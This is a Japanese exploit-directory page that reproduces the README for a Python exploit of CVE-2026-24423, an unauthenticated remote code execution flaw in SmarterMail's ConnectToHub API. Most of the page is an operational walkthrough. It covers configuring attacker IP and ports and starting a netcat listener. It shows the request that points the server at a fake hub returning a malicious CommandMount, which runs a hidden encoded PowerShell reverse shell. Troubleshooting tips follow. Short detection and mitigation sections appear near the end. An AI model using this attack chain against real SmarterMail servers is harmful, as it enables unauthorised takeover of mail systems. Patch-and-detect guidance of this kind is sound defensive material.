Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
SmarterMail-CVE-2026-24423 — CVE-2026-24423 のエクスプロイト — SmarterMail の ConnectToHub API における重大な未認証 RCE。ビルド 9511 より前のすべてのビルドに影響します。 | Kitploit
ツール/GitHubGitHub/cyberalp0/smartermail-cve-2026-24423
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミングリモートアクセスツール
GitHubcyberalp0/smartermail-cve-2026-24423

SmarterMail-CVE-2026-24423

CVE-2026-24423 のエクスプロイト — SmarterMail の ConnectToHub API における重大な未認証 RCE。ビルド 9511 より前のすべてのビルドに影響します。

リポジトリを見る
17時間2分前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

SmarterMail ConnectToHub RCE

CVE-2026-24423 を悪用するPythonベースのエクスプロイトです。SmarterTools SmarterMail の ConnectToHub 機能における認証なしリモートコード実行(RCE)の脆弱性を対象としています。

想定用途: 許可されたセキュリティテスト、CTF、Hack The Box ラボ、管理された研究環境のみ。


目次

  • 概要
  • CVE 詳細
  • 影響を受けるバージョン
  • 脆弱性の説明
  • 技術的詳細
  • エクスプロイトの流れ
  • 要件
  • 設定
  • 使用方法
  • 期待される出力
  • トラブルシューティング
  • スクリーンショット
  • プロジェクト構成
  • 緩和策
  • 参考情報
  • 免責事項

概要

CVE-2026-24423 は、SmarterTools SmarterMail に影響を与える認証なしリモートコード実行の脆弱性です。

この脆弱性は ConnectToHub 機能に存在します。認証されていない攻撃者が悪意のある hubAddress を提供することで、SmarterMail サーバーが攻撃者が制御するサーバーに対して HTTP リクエストを送信させることができます。

悪意のあるサーバーは、制御された SystemMount.CommandMount 値を含む細工された setup-initial-connection レスポンスで応答します。

影響を受ける SmarterMail インスタンスは、その後この値をオペレーティングシステムのコマンドとして処理し、SmarterMail サービスのセキュリティコンテキストで任意のコマンド実行を可能にします。

この脆弱性には CVSS 4.0 スコア 9.3(Critical) が割り当てられ、CWE-306: 重要な機能に対する認証の欠如 に分類されています。


CVE 詳細

フィールド値
CVECVE-2026-24423
ベンダーSmarterTools
製品SmarterMail
脆弱性認証なしリモートコード実行
CWECWE-306
CVSS v4.09.3 Critical
CVSS v3.19.8 Critical
攻撃ベクトルネットワーク
認証不要
ユーザー操作不要
複雑さ低
公開日2026年1月23日
修正ビルド9511

公式の CVE レコードは、この問題を ConnectToHub API メソッドを介した認証なし RCE として説明しています。


影響を受けるバージョン

ビルド 9511 より前 の SmarterMail バージョンが影響を受けます。

CVE レコードは影響範囲を次のように指定しています:

root@kitploit:~
SmarterMail < 100.0.9511

2026年1月15日にリリースされたビルド 9511 には、ベンダーの修正が含まれています。

影響を受けるバージョン

root@kitploit:~
< 100.0.9511

修正済みバージョン

root@kitploit:~
>= 100.0.9511

脆弱性を再現しようとする前に、常にインストールされている正確なビルドを確認してください。


脆弱性の説明

脆弱な機能は SmarterMail システム管理 API を通じて公開されています。

関連する操作は次のとおりです:

root@kitploit:~
/api/v1/settings/sysadmin/connect-to-hub

このエンドポイントは hubAddress パラメータを受け入れます。

概念的には、攻撃者は次のものを提供できます:

root@kitploit:~
{
    "hubAddress": "http://ATTACKER_IP:8081",
    "oneTimePassword": "temporary-value",
    "nodeName": "DC"
}

SmarterMail は提供されたハブアドレスに接続し、次のものを要求します:

root@kitploit:~
/web/api/node-management/setup-initial-connection

攻撃者が制御するサーバーは、悪意のある SystemMount オブジェクトを含む JSON で応答します。

重要なプロパティは次のとおりです:

root@kitploit:~
"SystemMount": {
    "Enabled": true,
    "ReadOnly": false,
    "MountPath": "...",
    "CommandMount": "..."
}

CommandMount 値は、その後、影響を受けるアプリケーションによってオペレーティングシステムのコマンドとして使用されます。

これにより、攻撃者は次の状態から遷移できます:

root@kitploit:~
認証なし HTTP リクエスト

から:

root@kitploit:~
リモートコマンド実行

VulnCheck の技術分析により、攻撃者が制御する hubAddress によって SmarterMail が攻撃者の setup-initial-connection エンドポイントを要求し、返された CommandMount が任意のコマンド実行を提供できることが確認されています。


技術的詳細

このエクスプロイトは2つのコンポーネントで構成されています:

1. 偽の SmarterMail ハブ

Python サーバーは次のものをリッスンします:

root@kitploit:~
POST /web/api/node-management/setup-initial-connection

そして、悪意のある SystemMount.CommandMount を含む細工された JSON レスポンスを返します。

2. リバースシェルリスナー

別の TCP リスナーが、ターゲット上で実行されたコマンドによって開始された接続を受信します。

このエクスプロイトは意図的に2つの別々のポートを使用します。

root@kitploit:~
8081
└── 偽の SmarterMail ハブ

4455
└── リバースシェルリスナー

エクスプロイトの流れ

root@kitploit:~
flowchart LR

    A[攻撃者<br/>10.10.14.50]

    H[偽の SmarterMail ハブ<br/>TCP/8081]

    T[SmarterMail ターゲット<br/>10.129.57.86]

    C[CommandMount<br/>コマンド実行]

    P[PowerShell]

    L[リバースシェルリスナー<br/>TCP/4455]

    A -->|ConnectToHub をトリガー| T
    T -->|HTTP POST| H
    H -->|悪意のある JSON| T
    T -->|CommandMount| C
    C --> P
    P -->|リバース TCP| L
    L --> A

接続 1 — 偽のハブ

root@kitploit:~
ターゲット
   |
   | HTTP
   v
10.10.14.50:8081

接続 2 — リバースシェル

root@kitploit:~
ターゲット
   |
   | TCP
   v
10.10.14.50:4455

これらのポートは異なる目的を果たすため、混同しないでください。


要件

  • Python 3
  • Linux 攻撃者マシン
  • Hack The Box VPN または同等の許可されたネットワーク
  • ターゲットから攻撃者へのネットワーク接続
  • Netcat
  • 脆弱な SmarterMail インストール

このエクスプロイトは Python 標準ライブラリのモジュールのみを使用します:

root@kitploit:~
http.server
json
base64

外部の Python パッケージは必要ありません。


設定

次の変数を編集します:

root@kitploit:~
LHOST = "10.10.14.50"
LPORT = 4455
HUB_PORT = 8081

HTB 環境の例の場合:

root@kitploit:~
LHOST     = 10.10.14.50
LPORT     = 4455
HUB_PORT  = 8081

LHOST

LHOST は、ターゲットが到達できる攻撃者の IP アドレスです。

Hack The Box の場合、これは通常 HTB VPN インターフェースに割り当てられた IP です:

root@kitploit:~
ip addr show tun0

例:

root@kitploit:~
tun0:
    inet 10.10.14.50

したがって:

root@kitploit:~
LHOST = "10.10.14.50"

LPORT

LPORT は、攻撃者がリバース接続を受信するために使用する TCP ポートです。

例:

root@kitploit:~
LPORT = 4455

HUB_PORT

HUB_PORT は、悪意のある SmarterMail ハブが使用する HTTP ポートです。

例:

root@kitploit:~
HUB_PORT = 8081

使用方法

1. リポジトリをクローン

root@kitploit:~
git clone https://github.com/<username>/<repository>.git
cd <repository>

2. エクスプロイトを設定

編集:

root@kitploit:~
nano exploit.py

設定:

root@kitploit:~
LHOST = "10.10.14.50"
LPORT = 4455
HUB_PORT = 8081

3. リバースシェルリスナーを起動

ターミナルを開きます:

root@kitploit:~
nc -lvnp 4455

期待される出力:

root@kitploit:~
Listening on 0.0.0.0 4455

このターミナルは開いたままにしてください。


4. 悪意のあるハブを起動

2つ目のターミナルを開きます:

root@kitploit:~
python3 exploit.py

選択したポートへのバインドに昇格した権限が必要な場合:

root@kitploit:~
sudo python3 exploit.py

期待される出力:

root@kitploit:~
============================================================
 SmarterMail fake hub
============================================================
[+] LHOST:      10.10.14.50
[+] LPORT:      4455
[+] HUB:        10.10.14.50:8081

[+] Waiting for SmarterMail...
============================================================

5. ConnectToHub をトリガー

脆弱な SmarterMail インスタンスに適切なリクエストを送信します。

指定する hubAddress は悪意のある HTTP サーバーを指している必要があります:

root@kitploit:~
{
    "hubAddress": "http://10.10.14.50:8081",
    "oneTimePassword": "tempst",
    "nodeName": "DC"
}

重要な値は次のとおりです:

root@kitploit:~
http://10.10.14.50:8081

リバースシェルポートをハブポートとして使用 しないで ください。


ポート設定の概要

目的IPポート
攻撃者 VPN10.10.14.50—
偽の SmarterMail ハブ10.10.14.508081
リバースシェル10.10.14.504455
HTB ターゲット10.129.57.86—

結果として得られるフローは次のとおりです:

root@kitploit:~
hubAddress
    ↓
10.10.14.50:8081
    ↓
悪意のある CommandMount
    ↓
PowerShell
    ↓
10.10.14.50:4455

ペイロードのエンコーディング

このエクスプロイトは PowerShell ペイロードを動的に作成します。

PowerShell の -EncodedCommand パラメータは、Base64 エンコーディングの前にコマンドが UTF-16LE でエンコードされていることを期待します。

スクリプトは次の処理を実行します:

root@kitploit:~
encoded = base64.b64encode(
    PS.encode("utf-16le")
).decode()

最終的なコマンドは次のように構成されます:

root@kitploit:~
powershell.exe -NoProfile -NonInteractive -WindowStyle Hidden -EncodedCommand <BASE64>

これにより、ペイロードを手動でエンコードする必要がなくなり、一般的な UTF-8/UTF-16LE エンコーディングの間違いを防ぐことができます。


期待される出力

ターゲットが悪意のあるハブに到達すると:

root@kitploit:~
[+] Received SmarterMail connection
[+] Path: /web/api/node-management/setup-initial-connection
[+] Body: ...
[+] Sending CommandMount payload
[+] Reverse shell -> 10.10.14.50:4455

リバースシェルリスナーはその後、接続を受信するはずです:

root@kitploit:~
Connection received on 10.129.57.86 XXXXX

接続後、基本的な検証を実行できます:

root@kitploit:~
whoami
root@kitploit:~
hostname

トラブルシューティング

偽のハブが接続を受信しない

サーバーがリッスンしているか確認します:

root@kitploit:~
ss -lntp | grep 8081

VPN アドレスを確認します:

root@kitploit:~
ip addr show tun0

LHOST がターゲットから到達可能なアドレスと一致していることを確認します。


偽のハブが HTTP 200 を受信するがシェルが得られない

HTTP リクエストが成功したということは、最初のステージが機能していることを意味します:

root@kitploit:~
ターゲット
  |
  | HTTP
  v
偽のハブ :8081

これは必ずしも2番目のステージが成功したことを意味するわけではありません。

確認:

root@kitploit:~
ss -lntp | grep 4455

Netcat がエクスプロイトをトリガーする 前 に起動されていることを確認してください。

また、次のことを確認します:

root@kitploit:~
LHOST = ターゲットから到達可能な攻撃者 IP
LPORT = リスナーポート

Netcat がシェルではなく HTTP リクエストを受信する

Netcat 内に次のものが表示される場合:

root@kitploit:~
POST /web/api/node-management/setup-initial-connection

hubAddress をリバースシェルリスナーに向けています。

誤り:

root@kitploit:~
hubAddress = http://10.10.14.50:4455

正しい:

root@kitploit:~
hubAddress = http://10.10.14.50:8081

2つのポートは分離したままにする必要があります。


HTTP 400 レスポンス

偽のハブが SmarterMail が期待する構造を返さない場合、400 レスポンスが発生する可能性があります。

レスポンスに次のものが含まれていることを確認します:

root@kitploit:~
"SystemMount": {
    "Enabled": true,
    "ReadOnly": false,
    "MountPath": "...",
    "CommandMount": "..."
}

また、要求されたパスが正確に次のとおりであることを確認します:

root@kitploit:~
/web/api/node-management/setup-initial-connection

公開されている脆弱性分析では、このエンドポイントが脆弱な ConnectToHub フローの一部として特定されています。


スクリーンショット

HTB ラボのスクリーンショットをここに追加します。

1. ターゲットの列挙

例:

root@kitploit:~
![Nmap Enumeration](https://raw.githubusercontent.com/cyberalp0/smartermail-cve-2026-24423/HEAD/screenshots/nmap.png)

推奨スクリーンショット:

  • Nmap の結果
  • SmarterMail サービス/バージョン
  • 関連する公開ポート

2. 悪意のあるハブ

root@kitploit:~
![Fake Hub](https://raw.githubusercontent.com/cyberalp0/smartermail-cve-2026-24423/HEAD/screenshots/fake-hub.png)

表示内容:

root@kitploit:~
[+] Received SmarterMail connection
[+] Sending CommandMount payload

3. エクスプロイトのトリガー

root@kitploit:~
![Burp Request](https://raw.githubusercontent.com/cyberalp0/smartermail-cve-2026-24423/HEAD/screenshots/burp-request.png)

次のものを含むリクエストを表示:

root@kitploit:~
{
    "hubAddress": "http://10.10.14.50:8081"
}

4. リバースシェル

root@kitploit:~
![Reverse Shell](https://raw.githubusercontent.com/cyberalp0/smartermail-cve-2026-24423/HEAD/screenshots/reverse-shell.png)

表示内容:

root@kitploit:~
Connection received on 10.129.57.86

および結果として得られるコマンドプロンプト。


プロジェクト構成

root@kitploit:~
smartermail-rce/
│
├── exploit.py
├── README.md
│
└── screenshots/
    ├── nmap.png
    ├── burp-request.png
    ├── fake-hub.png
    └── reverse-shell.png

検出

悪用の可能性のある指標には、次のものへの予期しないリクエストが含まれます:

root@kitploit:~
/api/v1/settings/sysadmin/connect-to-hub

および SmarterMail サーバーから以前は不明だった HTTP ホストへの送信接続。

管理者はまた、アプリケーション、IIS/リバースプロキシ、およびネットワークログで不審な ConnectToHub アクティビティを確認する必要があります。

CVE-2026-24423 は CISA の既知の悪用された脆弱性カタログに含まれており、ラボ環境以外でも悪用が観察されていることを示しています。


緩和策

主な是正措置は、SmarterMail を ビルド 9511 以降 にアップグレードすることです。ベンダーの2026年1月15日のリリースでこの脆弱性に対処しました。

即時のパッチ適用が不可能な場合、組織はさらに次のことを検討する必要があります:

  • SmarterMail 管理 API へのアクセスを制限する。
  • 管理エンドポイントへの不要な外部アクセスを防ぐ。
  • ネットワークセグメンテーションを適用する。
  • SmarterMail サーバーからの送信接続を監視する。
  • 不審な ConnectToHub リクエストがないか過去のログを確認する。
  • SmarterMail サービスアカウントによる予期しないコマンド実行を調査する。

参考情報

  • CVE レコード: CVE-2026-24423
  • VulnCheck: SmarterMail ConnectToHub 認証なし RCE
  • CODE WHITE: 公開脆弱性リスト
  • SmarterTools SmarterMail リリースノート
  • CISA 既知の悪用された脆弱性カタログ

免責事項

このプロジェクトは 許可されたセキュリティ研究および教育目的のみ を目的として提供されています。

所有していない、またはテストする明示的な許可を得ていないシステムに対してこのエクスプロイトを使用しないでください。

著者は、このソフトウェアの使用に起因する誤用、損害、データ損失、不正アクセス、その他の結果について一切の責任を負いません。

次のような管理された環境でのみ使用してください:

  • Hack The Box
  • Capture-the-Flag コンペティション
  • 個人のラボ
  • 許可されたペネトレーションテスト
  • セキュリティ研究環境

クレジット

CVE-2026-24423 は次の人物に帰属します:

  • Sina Kheirkhah
  • Piotr Bazydlo
  • Markus Wulftange
  • Cale Black

この CVE は 2026年1月23日に VulnCheck によって公開されました。

ツールをダウンロード